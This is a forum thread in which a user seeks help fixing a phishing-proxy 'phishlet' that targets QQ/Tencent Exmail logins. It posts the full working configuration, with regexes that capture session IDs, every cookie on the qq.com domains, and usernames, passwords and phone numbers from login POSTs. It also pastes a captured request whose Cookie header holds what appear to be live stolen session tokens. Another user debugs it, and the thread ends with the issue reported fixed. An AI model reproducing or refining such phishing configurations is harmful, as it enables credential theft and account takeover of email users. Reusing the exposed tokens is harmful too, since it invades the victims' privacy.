Phishlet not capturing cookies properly

Lula_Byi · November 17, 2024, 10:46pm

my qq phishlet doesn’t capture cookies properly the cookies i try to use that i captured doesnt work on my console

fluxxset · November 18, 2024, 4:53pm

pls use burp to debug more and then share your findings that will help me understand situation more.

Lula_Byi · November 19, 2024, 1:01am

i have used and checked on my proxy host everything is already perfect but still same issue unblock me on telegram so you can help out man

fluxxset · November 19, 2024, 4:40am

send the credential section from phshlet and
send the copy of the request captured in burp wich is sending credenatials .

Lula_Byi · November 19, 2024, 5:23am

i should send everything here ?
ok wait i will send to you

auth_tokens:
  - domain: 'en.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '\?sid=([^&]*)&sign_type='
    name: "sid"
  - domain: 'm.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '\?sid=([^&]*)&sign_type='
    name: "sid"
  - domain: 'exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '\?sid=([^&]*)&sign_type='
    name: "sid"
  - domain: 'en.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '&sign_type=&r=([^"]*)'
    name: "r"
  - domain: 'm.exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '&sign_type=&r=([^"]*)'
    name: "r"
  - domain: 'exmail.qq.com'
    type: "body"
    path: "/cgi-bin/frame_html"
    search: '&sign_type=&r=([^"]*)'
    name: "r"
  - domain: '.en.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: 'en.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: '.m.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: 'm.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: '.mail.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: 'mail.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: '.mail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: 'mail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: '.exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: 'exmail.qq.com'
    keys: [ '.*,regexp' ]
  - domain: '.qq.com'
    keys: [ '.*,regexp' ]

auth_urls:
  - '/cgi-bin/today'
  - '/qy_mng_logic/proxy/ajaxftn'
  - '/cgi-bin/setting4'

credentials:
  username:
    key: '(inputuin|uin)'
    search: '(.*\@.*)'
    type: 'post'
  password:
    key: '(password|ppclone|pwd|pp)'
    search: '(.*)'
    type: 'post'
  custom:
    - key: "mobile"
      search: '(.*)'
      type: "post"
    - key: "uin"
      search: '(.*)'
      type: "post"

Lula_Byi · November 19, 2024, 5:23am

give me few mins i will send a copy of the request section on burp

Lula_Byi · November 20, 2024, 9:42am

this is request captured in burp

GET /login HTTP/1.1
Host: en.exmail.qq.com
Cookie: [email protected]; msid=-1277130789&0QphQsUyq0t6_Ess@4; biz_username=3017836507; qm_sid=bce23ee1df0f79ac54c214c85aae0e1f,ctsbSKgC0VJM.; edition=mail.qq.com; username=-1277130789&3017836507; qm_sk=-1277130789&yKfZb-n5; qm_ssum=-1277130789&5de724c2cee6a62be304a34549769a75; qm_username=3017836507; _ga=GA1.3.1549353539.1731869246; Hm_lvt_bdfb0d7298c0c5a5a2475c291ac7aca2=1731869248; HMACCOUNT=68F6AE646975341D; qm_flag=3; qm_username=3017836507; CCSHOW=0000; qylevel=3; qm_sk=-1277130789&yKfZb-n5; timezone_offset=-60; 0.29622072175728076; bizticket=ChgI8/vpuQYSEOkcPuRUIVXLPHl0qTlEPNESgAHbpkgPTgSmdjPegsQx0jzmHjb4fgfxBm0LIjgFp6MDxGhJdlC6GVxbp7QDCCWuQMDamGyAfwFvuw13k6+YISfE9Y/ndz0sSG2DVjcvhsq6kGTV2qZChrx3JbMzEKTn3jMcRdZ+u6Ky49cMRzAnegpG+UMFyNTS55kxOPLXzUfdwxgA; qywwticket=ChgI8/vpuQYSEJa57duR54BpcMqotQWm858SkAFrOcpYk4D/Gv085cKth3Yq8GFdnO3FWRaswNxLNL3+HBeb7qHZRF9q90ZCzBto1nbB9MSfjzPcthnG5d+ePDWKCXGar90Hblg/EPwI6RPrynXhfMPgMYmGznfh1NoTPgZ/WFrK5KDmKZy3XbuAZSjvASuwolhCNdO7hVG1fIDqwFdoNl3twAOJ+LgNg9J55QYYhfa/t4KAgAM=; sid=-1277130789&41f91c271423d77fce6695aa7ff94f63; qm_sid=41f91c271423d77fce6695aa7ff94f63; new=1; qm_ssum=-1277130789&d13e94563b79519c7e5a209516928211; tinfo=1731995015.0000*; ssl_edition=mail.qq.com; sms_id=Xg2xZp3AqF1ONvJyIfEfgj3HVbZlmJwxArsMy78XGW8=; qm_authimgs_id=0; qm_verifyimagesession=h01ab1c7ccaab7513b0d028a96d0ce5b66efd7b630b758508164b78d20ae44dbe70c38c6fd91ba12cd7; Hm_lpvt_bdfb0d7298c0c5a5a2475c291ac7aca2=1731995027
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

fluxxset · November 20, 2024, 4:08pm

hmmm let me guss , chat gpt ?

fluxxset · November 20, 2024, 4:09pm

where is request body ?

Lula_Byi · November 20, 2024, 4:30pm

man just unblock me on telegram and come watch yourself
i really dont understand what you saying here

fluxxset · April 10, 2025, 8:40pm

issue Fixed